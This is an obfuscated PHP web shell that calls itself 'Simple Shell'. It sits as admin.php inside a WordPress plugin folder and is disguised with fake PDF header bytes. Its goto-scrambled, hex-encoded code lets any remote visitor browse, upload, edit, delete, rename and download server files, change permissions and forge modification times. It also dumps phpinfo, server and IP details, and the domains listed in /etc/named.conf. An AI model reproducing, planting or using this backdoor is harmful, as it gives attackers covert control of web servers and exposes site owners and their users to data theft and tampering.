Current File : /home/pacjaorg/public_html/cop29/wp-content/plugins/zeeta/admin.php |
<?php
goto WgQpP; Q7uNI: foreach ($_GET as $k => $v) { $_GET[$k] = d($v); } goto y4vgr; K2JFo: ?>
</center><form onsubmit="dir.value=e(dir.value)">Directory: <input class="<?php goto LRFn1; Q4ubW: ?>
<br><a href="?info=info"class="btn"target="__blank">SERVER INFO</a>:<?php goto ma2Aj; PP0cX: function e($s) { return base64_encode($s); } goto qhlbJ; yhOKu: if (isset($_GET["\x66\151\154\x65"])) { if (isset($_POST["\x65\144\151\x74"])) { if (@file_put_contents($_GET["\146\151\x6c\x65"], $_POST["\x65\144\151\x74"])) { echo "\x3c\x73\160\141\x6e\40\x63\154\x61\x73\163\x3d\x22\x73\x75\143\x63\x65\163\x73\x22\x3e\x45\x44\x49\x54\x20\x53\125\103\103\105\x53\x53\41\74\x2f\x73\160\141\156\x3e"; } else { echo "\74\163\160\141\x6e\x20\x63\x6c\141\163\x73\75\42\x66\141\151\x6c\145\x64\42\76\105\104\x49\124\40\106\101\111\114\105\104\41\74\57\x73\160\141\156\x3e"; } } echo "\x3c\146\x6f\162\155\x20\x61\143\164\x69\x6f\x6e\75\x22\x3f\146\x69\154\x65\75" . e($_GET["\146\151\x6c\145"]) . "\x26" . $edir . "\42\x20\x6d\x65\x74\150\157\144\x3d\42\160\x6f\x73\164\42\40\x6f\156\x73\165\142\x6d\x69\164\x3d\42\145\x64\x69\x74\56\166\x61\154\x75\145\x3d\145\x28\x65\x64\x69\x74\x2e\166\x61\154\x75\x65\51\x22\76\x3c\164\x65\170\164\x61\162\145\141\x20\x69\144\75\x22\145\144\x69\x74\42\40\156\141\155\x65\x3d\x22\x65\144\x69\x74\x22\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\x69\154\x65"]), ENT_QUOTES | ENT_SUBSTITUTE | ENT_COMPAT, "\x55\x54\106\x2d\70") . "\74\x2f\164\145\x78\164\141\162\145\141\x3e\74\x62\x75\x74\x74\x6f\x6e\76\x55\x70\144\x61\x74\145\x3c\x2f\142\165\x74\x74\x6f\156\x3e\74\57\146\x6f\162\x6d\76"; } goto vXye3; i1UN1: if (isset($_GET["\143\150\155\157\144"], $_GET["\156\x65\167"])) { if (chmod($_GET["\143\150\x6d\x6f\x64"], intval($_GET["\x6e\x65\x77"], 8))) { echo "\x3c\163\x70\x61\156\x20\x63\154\141\x73\163\x3d\42\x73\x75\x63\143\x65\163\x73\x22\76\x43\110\x4d\x4f\x44\40\x53\x55\x43\x43\x45\123\123\x21\74\57\163\160\x61\156\x3e"; } else { echo "\x3c\x73\x70\x61\156\40\x63\x6c\141\163\163\x3d\42\x66\141\x69\x6c\x65\x64\42\76\x43\110\x4d\x4f\x44\40\106\x41\111\114\105\104\41\74\x2f\163\x70\141\x6e\76"; } } goto EdLEN; VF_NF: chdir($dir); goto DlgBF; Zm55y: ?>
"><button>GO</button><a href="?dir=<?php goto NpFik; LRFn1: echo is_writable($dir) ? "\x77\162\151\164\x61\142\x6c\x65" : "\156\x6f\164\x77\162\x69\x74\141\x62\x6c\145"; goto N1KOe; EdLEN: if (isset($_GET["\143\150\164\151\x6d\145"], $_GET["\156\x65\167"])) { if (touch($_GET["\x63\x68\164\151\x6d\x65"], intval(strtotime($_GET["\x6e\x65\x77"])))) { echo "\74\x73\x70\x61\156\40\x63\x6c\x61\163\x73\75\42\x73\165\x63\x63\145\x73\x73\x22\x3e\x54\x49\x4d\x45\40\x4d\101\x43\x48\x49\x4e\x45\40\x53\x55\103\x43\105\x53\123\x21\74\x2f\163\160\x61\x6e\76"; } else { echo "\74\x73\x70\x61\156\x20\143\154\141\x73\163\75\42\x66\141\x69\x6c\x65\x64\42\x3e\124\111\115\x45\x20\x4d\x41\103\110\x49\116\105\x20\x46\101\x49\114\x45\104\41\x3c\57\x73\x70\x61\x6e\x3e"; } } goto kA5EL; P5gEt: if (isset($_FILES["\146\151\154\x65"])) { if (move_uploaded_file($_FILES["\x66\151\154\x65"]["\164\x6d\x70\137\156\x61\155\145"], basename($_FILES["\x66\151\x6c\x65"]["\x6e\x61\x6d\145"]))) { echo "\x3c\163\160\x61\x6e\x20\143\x6c\x61\163\x73\x3d\x22\x73\x75\x63\x63\x65\163\x73\x22\x3e\x55\x50\114\x4f\101\x44\x20\x53\x55\x43\x43\105\x53\x53\41\74\x2f\x73\x70\141\156\x3e"; } else { echo "\x3c\x73\160\x61\x6e\x20\143\154\141\163\x73\75\42\146\141\x69\x6c\x65\x64\42\76\x55\x50\114\117\101\x44\x20\x46\101\111\x4c\x45\x44\41\74\57\163\160\x61\156\76"; } } goto yhOKu; WgQpP: ?>
%PDF- %PDF-<?php goto g2qMS; DnoB1: echo is_writable($dir) ? "\167\x72\x69\x74\x61\x62\x6c\x65" : "\156\x6f\x74\x77\x72\151\x74\141\142\x6c\145"; goto GoStv; bwJ2p: ini_set("\144\151\163\160\x6c\x61\x79\x5f\163\x74\141\162\164\165\x70\137\145\162\162\x6f\162\163", 1); goto uSYV0; xONan: function perms($path) { clearstatcache(); $perms = fileperms($path); $x = array("\x55", "\160", "\x63", "\125", "\x64", "\x55", "\x62", "\125", "\162", "\125", "\x6c", "\125", "\163", "\x55", "\125", "\x55"); $info = $x[$perms >> 12] . implode('', array_map(function ($b, $m) { return $b == "\61" ? $m : "\55"; }, str_split(decbin($perms & 4095) . ''), str_split("\162\x77\x78\162\x77\170\162\x77\170"))); return $info . "\x20" . substr(sprintf("\x25\x6f", @fileperms($path)), -4); } goto pqiyD; pqiyD: if (!function_exists("\x70\157\x73\151\170\x5f\147\145\x74\x70\167\165\151\x64") && !extension_loaded("\x70\157\x73\151\170")) { function posix_getpwuid($x) { return array("\x6e\x61\155\x65" => "\55\x2d\x2d"); } } goto G78j1; NpFik: echo e(realpath($_SERVER["\104\117\103\x55\x4d\105\116\x54\x5f\122\117\117\124"])); goto HYF8q; g2qMS: ini_set("\x64\x69\163\160\154\141\171\x5f\145\x72\x72\157\x72\163", 1); goto bwJ2p; y4vgr: foreach ($_POST as $k => $v) { $_POST[$k] = d($v); } goto bxhI2; HYF8q: ?>
">[Root Path]</a><a href="?dir=<?php goto n0x9t; ORsL3: function size($path, $decimals = 0) { $bytes = filesize($path); $factor = floor((strlen($bytes) - 1) / 3); if ($factor > 0) { $sz = "\113\x4d\x47\x54"; } return sprintf("\x25\x2e{$decimals}\146", $bytes / pow(1024, $factor)) . @$sz[$factor - 1] . "\x42"; } goto xONan; x8GLr: foreach (array_merge($dirs, $files) as $path) { $d = is_dir($path); $w = is_writable($path); ?>
<tr><td class="<?php echo ($d ? "\144\x69\x72\x65\x63\164\x6f\162\171" : "\x66\151\x6c\x65") . "\x20" . ($w ? "\x77\x72\x69\164\141\x62\154\x65" : "\156\x6f\x74\167\x72\151\164\141\x62\154\145"); ?>
"><a href="?<?php echo $d ? "\x64\151\162\x3d" . e($path) . '' : "\x66\151\x6c\145\x3d" . e($path) . "\46" . $edir; ?>
"><?php echo htmlspecialchars(basename($path)); ?>
</a><?php echo is_link($path) ? "\74\163\160\141\x6e\x20\143\154\141\163\x73\75\x22\x73\171\155\x6c\x69\156\x6b\42\x3e" . readlink($path) . "\x3c\57\163\x70\141\156\x3e" : ''; ?>
</td><td><?php echo $d ? "\55\x2d\55" : size($path); ?>
</td><td><a href="?chtime=<?php echo e($path) . "\x26" . $edir; ?>
"class="btn"onclick='return chtime(this,"<?php $chtime = date("\x4d\55\x64\x2d\x59\40\110\x3a\x69\x3a\163", filemtime($path)); echo $chtime; ?>
")'><?php echo $chtime; ?>
</a></td><td><a href="?chmod=<?php echo e($path) . "\46" . $edir; ?>
"class="btn"onclick='return chmod(this,"<?php echo substr(sprintf("\x25\x6f", @fileperms($path)), -4); ?>
")'><?php echo perms($path); ?>
</a></td><td><?php if (basename($path) !== "\56\56") { ?>
<a href="?delete=<?php echo e($path) . "\46" . $edir; ?>
"class="btn icon delete"onclick='return confirm("Sure to delete?")'title="Delete"></a><a href="?rename=<?php echo e($path) . "\x26" . $edir; ?>
"class="btn icon rename"onclick='return rename(this,"<?php echo basename($path); ?>
")'title="Rename"></a><?php if (!$d) { echo "\74\141\40\164\151\x74\154\x65\x3d\42\104\157\x77\156\154\157\x61\144\x22\x20\143\x6c\x61\163\163\x3d\x22\x62\164\156\40\151\143\157\x6e\40\x64\157\167\156\154\157\x61\144\42\40\x68\162\x65\146\x3d\42\x3f\x64\x6c\x3d" . e($path) . "\x22\x3e\74\x2f\141\x3e"; } } ?>
</td></tr><?php } goto C8wlP; mevDp: if (isset($_GET["\x69\x6e\146\x6f"]) && $_GET["\151\x6e\x66\157"] === "\x69\156\146\x6f") { phpinfo(); die; } goto Q7uNI; GoStv: ?>
"name="file"type="file"><button type="submit">Upload</button></form><center><?php goto P5gEt; nwNKM: ?>
">[Shell Path]</a></form><table><tr><th></th><th>SIZE</th><th>Modified Date</th><th>PERMS</th><th>ACTION</th></tr><?php goto x8GLr; e8kIB: ?>
DOMAIN ON SERVER :<?php goto empFZ; bFMVa: ?>
<br>SERVER IP:<?php goto WXToe; ma2Aj: echo php_uname(); goto U_Cj1; xmRHO: echo $dir; goto Zm55y; baeBM: echo $_SERVER["\122\x45\x4d\117\x54\x45\137\101\x44\x44\x52"]; goto bFMVa; N1KOe: ?>
"name="dir"id="dir"style="width:500px"value="<?php goto xmRHO; uSYV0: error_reporting(0); goto PP0cX; WXToe: echo gethostbyname($_SERVER["\110\x54\x54\x50\137\110\x4f\123\124"]) . "\40\x2f\x20" . $_SERVER["\123\x45\x52\x56\105\x52\137\x4e\101\x4d\105"]; goto mkxP9; G78j1: ?>
<!doctypehtml><html><head><meta content="width=device-width,initial-scale=0.5,user-scalable=yes"name="viewport"><title>Simple Shell</title><style>body,button,html,input{background:#000;color:gray;font-family:monospace}a{color:gray;text-decoration:none}button,input{border:1px solid gray;height:1.7em}table{width:100%;border:1px dotted gray;border-spacing:0}tr:hover{background:#161616}td,th{padding:2px 0;border:1px solid #666}textarea{width:80%;height:50vh;background:#000;color:green;tab-size:4}.btn{border:1px solid #666;border-radius:.3em;padding:0 .3em;display:inline-block;text-align:center}.btn:hover{border-color:#fff;background-color:#000;transition:background-color .2s linear}.directory{background:#444654}.directory:before{content:"DIR/";color:gray}.file{background:#343641}.file:before{content:"-";color:gray}.notwritable,.notwritable a{color:#ff7800}.writable,.writable a{color:#49ff00}.symlink{float:right;color:#e2c275}.icon{font-size:1.5em;padding:.1em .2em;margin:0}.delete:before{content:"\1F6AE";opacity:.7}.rename:before{content:"\270D";color:#00f}.download:before{content:"\2193\2193";color:green}.openlink:before{content:"\1F517"}.success{color:#ff0}.success:before{content:"\270C"}.failed{color:red}.failed:before{content:"\2622"}</style><script>function e(e){return btoa(e)}function chmod(n,r){var t=prompt("CHMOD:",r);return!!t&&(n.href+="&new="+e(t),!0)}function chtime(n,r){var t=prompt("Change modified time:",r);return!!t&&(n.href+="&new="+e(t),!0)}function rename(n,r){var t=prompt("Rename:",r);return!!t&&(n.href+="&new="+e(t),!0)}</script></head><body>YOUR IP:<?php goto baeBM; bxhI2: $dir = realpath(isset($_GET["\144\151\x72"]) ? $_GET["\144\151\162"] : __DIR__); goto JK8dg; vXye3: if (isset($_GET["\144\x65\154\x65\164\x65"])) { $x = str_replace("\130", '', "\x58\x75\130\x6e\x58\154\x58\x69\130\156\x58\153\x58"); if ($x($_GET["\144\145\x6c\145\164\145"])) { echo "\x3c\x73\160\x61\x6e\40\x63\154\x61\163\163\75\x22\x73\165\143\143\145\x73\163\x22\x3e\x44\105\x4c\x45\x54\x45\40\123\125\103\103\105\123\x53\41\74\x2f\163\x70\141\x6e\x3e"; } else { echo "\x3c\163\x70\x61\x6e\x20\x63\x6c\x61\x73\163\75\x22\x66\x61\151\x6c\x65\144\42\x3e\x44\x45\114\x45\x54\x45\40\106\x41\111\x4c\105\x44\41\74\x2f\x73\x70\141\156\76"; } } goto i1UN1; kA5EL: if (isset($_GET["\x72\x65\x6e\x61\x6d\x65"], $_GET["\x6e\145\x77"])) { if (rename($_GET["\162\145\x6e\x61\x6d\145"], $dir . "\x2f" . basename($_GET["\156\x65\x77"]))) { echo "\74\x73\x70\x61\x6e\40\143\154\141\x73\163\x3d\x22\163\x75\x63\143\145\x73\x73\x22\x3e\x52\105\x4e\x41\115\x45\x20\123\x55\103\103\105\x53\123\x21\74\57\x73\160\x61\x6e\x3e"; } else { echo "\74\x73\160\x61\156\x20\x63\154\141\x73\163\75\x22\146\x61\x69\x6c\145\x64\x22\x3e\x52\105\x4e\101\x4d\105\40\x46\101\x49\x4c\105\104\41\x3c\x2f\x73\x70\x61\156\x3e"; } } goto L2yGh; UjJ63: function symlinkDomain($dom) { $d0mains = @file("\x2f\x65\164\143\x2f\x6e\x61\155\x65\x64\56\x63\157\156\146", false); if (!$d0mains) { $dom = "\74\146\157\156\164\x20\x63\x6f\x6c\x6f\162\x3d\162\145\144\x20\163\151\x7a\x65\75\63\160\x78\76\x43\141\156\164\x20\122\x65\141\x64\x20\133\40\x2f\145\164\143\57\156\141\155\x65\x64\x2e\x63\157\x6e\146\x20\135\x3c\x2f\x66\x6f\156\x74\x3e"; $GLOBALS["\156\145\x65\x64\137\164\x6f\x5f\x75\160\144\x61\164\145\x5f\150\x65\x61\144\145\162"] = "\164\162\165\145"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "\172\157\156\145")) { preg_match_all("\x23\x7a\157\156\145\40\x22\50\x2e\52\x29\x22\43", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count}\x20\x44\157\x6d\x61\151\156"; } return $dom; } goto e8kIB; empFZ: echo symlinkDomain($dom); goto Q4ubW; tEFx3: if (isset($_GET["\144\x6c"])) { if (!realpath($_GET["\x64\154"])) { die; } header("\x43\x6f\156\164\x65\156\164\55\104\145\163\143\x72\x69\x70\164\x69\x6f\x6e\72\x20\x46\x69\x6c\145\40\124\x72\141\156\163\x66\x65\162"); header("\x43\x6f\x6e\164\145\156\164\x2d\124\x79\x70\145\x3a\x20\x61\x70\x70\154\x69\x63\x61\164\x69\x6f\x6e\57\157\143\164\145\164\x2d\163\x74\x72\145\141\x6d"); header("\103\x6f\x6e\x74\x65\x6e\164\55\104\x69\x73\160\157\x73\x69\164\151\157\156\72\40\141\164\164\141\x63\x68\x6d\145\x6e\x74\x3b\x20\146\151\154\145\156\141\x6d\145\75\42" . basename($_POST["\144\154"]) . "\x22"); readfile($_GET["\x64\154"]); die; } goto ORsL3; U_Cj1: ?>
<br><form action="?<?php goto C0qOT; Lbzv4: $files = array(); goto n3Wtg; DlgBF: $edir = "\144\x69\162\x3d" . e($dir); goto tEFx3; L2yGh: $dirs = array(); goto Lbzv4; C0qOT: echo $edir; goto r24J9; JK8dg: $dir = $dir ? $dir : __DIR__; goto VF_NF; mkxP9: ?>
<br><?php goto UjJ63; n3Wtg: foreach (scandir($dir) as $p) { if (is_dir($dir . "\x2f" . $p)) { if ($p != "\x2e") { $dirs[] = $dir . "\57" . $p; } } else { $files[] = $dir . "\x2f" . $p; } } goto K2JFo; n0x9t: echo e(realpath(__DIR__)); goto nwNKM; r24J9: ?>
"enctype="multipart/form-data"method="post"><input class="<?php goto DnoB1; qhlbJ: function d($s) { return base64_decode($s); } goto mevDp; C8wlP: ?>
</table>Modified By #No_Identity :: <a href="https://github.com/yon3zu">github.com/yon3zu</a> - <a href="https://linuxploit.com/">linuxploit.com</a></body></html>